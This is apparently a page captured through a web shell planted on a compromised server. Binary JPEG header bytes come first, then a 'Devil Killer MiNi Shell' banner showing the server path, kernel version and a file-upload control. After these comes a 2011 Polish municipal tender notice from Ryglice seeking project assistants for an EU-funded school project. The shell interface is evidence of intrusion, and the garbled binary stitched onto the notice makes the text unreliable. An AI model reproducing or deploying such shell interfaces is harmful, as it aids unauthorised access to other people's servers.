JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110215/22610-N-2011.html

<p class="kh_header"><b>Ryglice: Pełnienie funkcji asystenta ds. merytorycznych kierownika projektu Otwarci na Przyszłość współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego:
- Część I: Pełnienie funkcji asystenta ds. merytorycznych kierownika projektu Otwarci na Przyszłość realizowanego w Publicznym Gimnazjum przy Zespole Szkolno -Przedszkolnym w Zalasowej;
- Część II: Pełnienie funkcji asystenta ds. merytorycznych kierownika projektu Otwarci na Przyszłość realizowanego w Publicznym Gimnazjum przy  Zespole Szkół w Lubczy</b><br>
<b>Numer ogłoszenia: 22610 - 2011; data zamieszczenia: 15.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Ryglic , ul. Rynek 9, 33-160 Ryglice, woj. małopolskie, tel. 014 6541035, faks 014 6541054.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ryglice.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji asystenta ds. merytorycznych kierownika projektu Otwarci na Przyszłość współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego:
- Część I: Pełnienie funkcji asystenta ds. merytorycznych kierownika projektu Otwarci na Przyszłość realizowanego w Publicznym Gimnazjum przy Zespole Szkolno -Przedszkolnym w Zalasowej;
- Część II: Pełnienie funkcji asystenta ds. merytorycznych kierownika projektu Otwarci na Przyszłość realizowanego w Publicznym Gimnazjum przy  Zespole Szkół w Lubczy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)Przedmiotem zamówienia jest pełnienie funkcji asystenta ds. merytorycznych kierownika projektu  Otwarci na Przyszłość UDA-POKL.09.01.02-12-078/10-00 w ramach Programu Operacyjnego Kapitał Ludzki. Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie  wysokiej jakości   usług  edukacyjnych  świadczonych  w  systemie  oświaty współfinansowanego   przez   Unię    Europejską   ze    środków Europejskiego  Funduszu Społecznego:
- Część I: Pełnienie funkcji asystenta ds. merytorycznych kierownika projektu Otwarci na Przyszłość realizowanego w Publicznym Gimnazjum przy Zespole Szkolno -Przedszkolnym w Zalasowej;
- Część II: Pełnienie funkcji asystenta ds. merytorycznych kierownika projektu Otwarci na Przyszłość realizowanego w Publicznym Gimnazjum przy  Zespole Szkół w Lubczy.
Przedmiotem   zamówienia jest  pełnienie  funkcji asystenta ds. merytorycznych kierownika projektu,   do   którego obowiązków będzie należało:
1.Nadzór nad realizowanymi w danym gimnazjum działaniami.
2.Współpraca z kierownikiem projektu.
3.Rekrutacja Beneficjentów Ostatecznych projektu.
4.Organizowanie wycieczek.
5.Sprawozdawczość, monitoring w danej jednostce.
6.Uczestnictwo w przygotowaniu i przeprowadzaniu procedury zakupu sprzętu i innych materiałów przewidzianych w budżecie projektu. 
7.Prowadzenie wspólnie z kierownikiem projektu i księgową Biura Projektu.
8.Nadzorowanie wspólnie z kierownikiem projektu pracy wszystkich osób zaangażowanych w realizację projektu.
9.Koordynacja działań merytorycznych i logistycznych związanych z projektem.
10.Planowanie działań i wywiązywanie się ze wskaźników.
11.Poddanie się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne w zakresie realizacji projektu.
12.Obecność podczas kontroli projektu.
13.Zaprojektowanie ankiet ewaluacyjnych dla potrzeb ewaluacji zgodnie z wytycznymi  w projekcie.
14.Monitoring i ewaluacja projektu oraz jego promocja.
15.Podsumowanie projektu.
16.Dokonywanie innych czynności zastrzeżonych do kompetencji asystenta ds. merytorycznych.

Pozostałe warunki dotyczące realizacji zamówienia zostały określone we wzorze umowy stanowiącym załącznik nr 8 do SIWZ.

2)Wykonywanie zleconych zadań odbywać się będzie w poszczególnych gimnazjach, tj.:
- Publicznym Gimnazjum przy Zespole Szkolno -Przedszkolnym w Zalasowej,
- Publicznym Gimnazjum przy  Zespole Szkół w Lubczy,
przez czas trwania   umowy,    od   daty podpisania umowy do   29.06.2012 r., z zastrzeżeniem,  że wyłącza się  z okresu realizacji zamówienia miesiące wakacyjne, tj. lipiec i sierpień 2011 r.

Wykonawcy przyjmujący   obowiązki   związane   z   prowadzeniem   Projektu   będą  zatrudnieni   przez Zamawiającego na podstawie umowy zlecenia. Wykonawców obowiązuje należyta staranność  w wykonywaniu przedmiotu zamówienia.

3)Dane dotyczące projektu Otwarci na Przyszłość współfinansowanego ze środków Europejskiego Funduszu Społecznego i Budżetu Państwa w ramach programu POKL działanie 9.1, poddziałanie 9.1.2.
-Miejsca realizacji: Publiczne Gimnazjum w Ryglicach, Publiczne Gimnazjum przy Zespole Szkolno -Przedszkolnym w Zalasowej, Publiczne Gimnazjum przy  Zespole Szkół w Lubczy.
-Biuro Projektu: Urząd Miejski w Ryglicach, ul. Rynek 9, 33-160 Ryglice.
-Termin realizacji projektu: od 03.01.2011 roku do 29.06.2012 roku, -Wartość projektu - 430 953,80 zł.
- Tematyka projektu: Projekt polega na wyrównaniu szans edukacyjnych uczniów z trzech wyżej wymienionych szkół gimnazjalnych i podniesieniu jakości kształcenia.

4)UWAGA: zatrudnienie Wykonawcy przez Zamawiającego musi być zgodne z przepisami odrębnymi, w szczególności z przepisami Kodeksu pracy. Zatrudnienie Wykonawcy na podstawie umowy cywilnoprawnej nie może stanowić powielenia jego obowiązków wynikających z umowy o pracę jaką ma zawartą z Zamawiającym (np. dyrektorzy szkół dla których organem prowadzącym jest Gmina Ryglice).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia zapewniającego wykonanie zamówienia, jeżeli Wykonawca wykaże wykonanie, a w przypadku świadczeń okresowych lub ciągłych również wykonywanie, usług w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, co najmniej 1 zamówienia polegającego na pracy z Beneficjentem Ostatecznym (praca w szkole podstawowej lub gimnazjum)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dysponowania osobami zdolnymi do wykonania zamówienia, jeżeli Wykonawca:
- oświadczy, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia , jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
Osoba ww musi legitymować się wykształceniem wyższym</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)formularz oferty - zgodnie z załącznikiem nr 1 do SIWZ, 2)jeżeli uprawnienie do reprezentacji osoby podpisującej ofertę nie wynika z załączonych do oferty dokumentów, do oferty należy dołączyć pełnomocnictwo lub dokument, z którego będzie wynikać uprawnienie do podpisywania oferty, np. aktualny odpis z właściwego rejestru, aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, aktualny statut spółki lub aktualny rejestr handlowy, 3)pełnomocnictwo do reprezentowania wykonawcy, o ile ofertę składa pełnomocnik</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonał wyboru Wykonawcy, w przypadku wystąpienia w trakcie realizacji zawartej umowy następującej okoliczności: - w przypadku zmiany urzędowej wysokości stawki podatku VAT, na wniosek Wykonawcy lub Zamawiającego, zostanie sporządzony aneks do umowy uwzględniający zmiany wartości wynikające z tego tytułu</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ryglice.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Ryglicach, 33-160 Ryglice, ul. Rynek 9, Sekretariat pok. 17.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.02.2011 godzina 09:30, miejsce: Urząd Miejski w Ryglicach, 33-160 Ryglice, ul. Rynek 9, Sekretariat pok. 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotem zamówienia jest pełnienie funkcji asystenta ds. merytorycznych kierownika projektu  Otwarci na Przyszłość UDA-POKL.09.01.02-12-078/10-00 w ramach Programu Operacyjnego Kapitał Ludzki. Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie  wysokiej jakości   usług  edukacyjnych  świadczonych  w  systemie  oświaty współfinansowanego   przez   Unię    Europejską   ze    środków Europejskiego  Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I: Pełnienie funkcji asystenta ds. merytorycznych kierownika projektu Otwarci na Przyszłość realizowanego w Publicznym Gimnazjum przy Zespole Szkolno -Przedszkolnym w Zalasowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)Przedmiotem zamówienia jest pełnienie funkcji asystenta ds. merytorycznych kierownika projektu  Otwarci na Przyszłość UDA-POKL.09.01.02-12-078/10-00 w ramach Programu Operacyjnego Kapitał Ludzki. Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie  wysokiej jakości   usług  edukacyjnych  świadczonych  w  systemie  oświaty współfinansowanego   przez   Unię    Europejską   ze    środków Europejskiego  Funduszu Społecznego:
- Część I: Pełnienie funkcji asystenta ds. merytorycznych kierownika projektu Otwarci na Przyszłość realizowanego w Publicznym Gimnazjum przy Zespole Szkolno -Przedszkolnym w Zalasowej.
Przedmiotem   zamówienia jest  pełnienie  funkcji asystenta ds. merytorycznych kierownika projektu,   do   którego obowiązków będzie należało:
1.Nadzór nad realizowanymi w danym gimnazjum działaniami.
2.Współpraca z kierownikiem projektu.
3.Rekrutacja Beneficjentów Ostatecznych projektu.
4.Organizowanie wycieczek.
5.Sprawozdawczość, monitoring w danej jednostce.
6. Uczestnictwo w przygotowaniu i przeprowadzaniu procedury zakupu sprzętu i innych materiałów przewidzianych w budżecie projektu. 
7.Prowadzenie wspólnie z kierownikiem projektu i księgową Biura Projektu.
8. Nadzorowanie wspólnie z kierownikiem projektu pracy wszystkich osób zaangażowanych w realizację projektu.
9. Koordynacja działań merytorycznych i logistycznych związanych z projektem.
10.Planowanie działań i wywiązywanie się ze wskaźników.
11.Poddanie się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne w zakresie realizacji projektu.
12.Obecność podczas kontroli projektu.
13.Zaprojektowanie ankiet ewaluacyjnych dla potrzeb ewaluacji zgodnie z wytycznymi  w projekcie.
14.Monitoring i ewaluacja projektu oraz jego promocja.
15.Podsumowanie projektu.
16.Dokonywanie innych czynności zastrzeżonych do kompetencji asystenta ds. merytorycznych.

Pozostałe warunki dotyczące realizacji zamówienia zostały określone we wzorze umowy stanowiącym załącznik nr 8 do SIWZ.

2)Wykonywanie zleconych zadań odbywać się będzie w poszczególnych gimnazjach, tj.:
- Publicznym Gimnazjum przy Zespole Szkolno -Przedszkolnym w Zalasowej,
przez czas trwania   umowy,    od   daty podpisania umowy do   29.06.2012 r., z zastrzeżeniem,  że wyłącza się  z okresu realizacji zamówienia miesiące wakacyjne, tj. lipiec i sierpień 2011 r.

Wykonawcy przyjmujący   obowiązki   związane   z   prowadzeniem   Projektu   będą  zatrudnieni   przez Zamawiającego na podstawie umowy zlecenia. Wykonawców obowiązuje należyta staranność  w wykonywaniu przedmiotu zamówienia.

3)Dane dotyczące projektu Otwarci na Przyszłość współfinansowanego ze środków Europejskiego Funduszu Społecznego i Budżetu Państwa w ramach programu POKL działanie 9.1, poddziałanie 9.1.2.
-Miejsca realizacji: Publiczne Gimnazjum w Ryglicach, Publiczne Gimnazjum przy Zespole Szkolno -Przedszkolnym w Zalasowej, Publiczne Gimnazjum przy  Zespole Szkół w Lubczy.
-Biuro Projektu: Urząd Miejski w Ryglicach, ul. Rynek 9, 33-160 Ryglice.
-Termin realizacji projektu: od 03.01.2011 roku do 29.06.2012 roku, -Wartość projektu - 430 953,80 zł.
- Tematyka projektu: Projekt polega na wyrównaniu szans edukacyjnych uczniów z trzech wyżej wymienionych szkół gimnazjalnych i podniesieniu jakości kształcenia.

4.UWAGA: zatrudnienie Wykonawcy przez Zamawiającego musi być zgodne z przepisami odrębnymi, w szczególności z przepisami Kodeksu pracy. Zatrudnienie Wykonawcy na podstawie umowy cywilnoprawnej nie może stanowić powielenia jego obowiązków wynikających z umowy o pracę jaką ma zawartą z Zamawiającym (np. dyrektorzy szkół dla których organem prowadzącym jest Gmina Ryglice).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II: Pełnienie funkcji asystenta ds. merytorycznych kierownika projektu Otwarci na Przyszłość realizowanego w Publicznym Gimnazjum przy  Zespole Szkół w Lubczy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)Przedmiotem zamówienia jest pełnienie funkcji asystenta ds. merytorycznych kierownika projektu  Otwarci na Przyszłość UDA-POKL.09.01.02-12-078/10-00 w ramach Programu Operacyjnego Kapitał Ludzki. Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie  wysokiej jakości   usług  edukacyjnych  świadczonych  w  systemie  oświaty współfinansowanego   przez   Unię    Europejską   ze    środków Europejskiego  Funduszu Społecznego:
- Część II: Pełnienie funkcji asystenta ds. merytorycznych kierownika projektu Otwarci na Przyszłość realizowanego w Publicznym Gimnazjum przy  Zespole Szkół w Lubczy.
Przedmiotem   zamówienia jest  pełnienie  funkcji asystenta ds. merytorycznych kierownika projektu,   do   którego obowiązków będzie należało:
1.Nadzór nad realizowanymi w danym gimnazjum działaniami.
2.Współpraca z kierownikiem projektu.
3.Rekrutacja Beneficjentów Ostatecznych projektu.
4.Organizowanie wycieczek.
5.Sprawozdawczość, monitoring w danej jednostce.
6.Uczestnictwo w przygotowaniu i przeprowadzaniu procedury zakupu sprzętu i innych materiałów przewidzianych w budżecie projektu. 
7.Prowadzenie wspólnie z kierownikiem projektu i księgową Biura Projektu.
8.Nadzorowanie wspólnie z kierownikiem projektu pracy wszystkich osób zaangażowanych  w realizację projektu.
9.Koordynacja działań merytorycznych i logistycznych związanych z projektem.
10.Planowanie działań i wywiązywanie się ze wskaźników.
11.Poddanie się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne w zakresie realizacji projektu.
12.Obecność podczas kontroli projektu.
13.Zaprojektowanie ankiet ewaluacyjnych dla potrzeb ewaluacji zgodnie z wytycznymi  w projekcie.
14.Monitoring i ewaluacja projektu oraz jego promocja.
15.Podsumowanie projektu.
16.Dokonywanie innych czynności zastrzeżonych do kompetencji asystenta ds. merytorycznych.

Pozostałe warunki dotyczące realizacji zamówienia zostały określone we wzorze umowy stanowiącym załącznik nr 8 do SIWZ.

2)Wykonywanie zleconych zadań odbywać się będzie w poszczególnych gimnazjach, tj.:
- Publicznym Gimnazjum przy  Zespole Szkół w Lubczy,
przez czas trwania   umowy,    od   daty podpisania umowy do   29.06.2012 r., z zastrzeżeniem,  że wyłącza się  z okresu realizacji zamówienia miesiące wakacyjne, tj. lipiec i sierpień 2011 r.

Wykonawcy przyjmujący   obowiązki   związane   z   prowadzeniem   Projektu   będą  zatrudnieni   przez Zamawiającego na podstawie umowy zlecenia. Wykonawców obowiązuje należyta staranność w wykonywaniu przedmiotu zamówienia.

3)Dane dotyczące projektu Otwarci na Przyszłość współfinansowanego ze środków Europejskiego Funduszu Społecznego i Budżetu Państwa w ramach programu POKL działanie 9.1, poddziałanie 9.1.2.
-Miejsca realizacji: Publiczne Gimnazjum w Ryglicach, Publiczne Gimnazjum przy Zespole Szkolno -Przedszkolnym w Zalasowej, Publiczne Gimnazjum przy  Zespole Szkół w Lubczy.
-Biuro Projektu: Urząd Miejski w Ryglicach, ul. Rynek 9, 33-160 Ryglice.
-Termin realizacji projektu: od 03.01.2011 roku do 29.06.2012 roku, -Wartość projektu - 430 953,80 zł.
- Tematyka projektu: Projekt polega na wyrównaniu szans edukacyjnych uczniów z trzech wyżej wymienionych szkół gimnazjalnych i podniesieniu jakości kształcenia.

4)UWAGA: zatrudnienie Wykonawcy przez Zamawiającego musi być zgodne z przepisami odrębnymi, w szczególności z przepisami Kodeksu pracy. Zatrudnienie Wykonawcy na podstawie umowy cywilnoprawnej nie może stanowić powielenia jego obowiązków wynikających z umowy o pracę jaką ma zawartą z Zamawiającym (np. dyrektorzy szkół dla których organem prowadzącym jest Gmina Ryglice).</p></li>
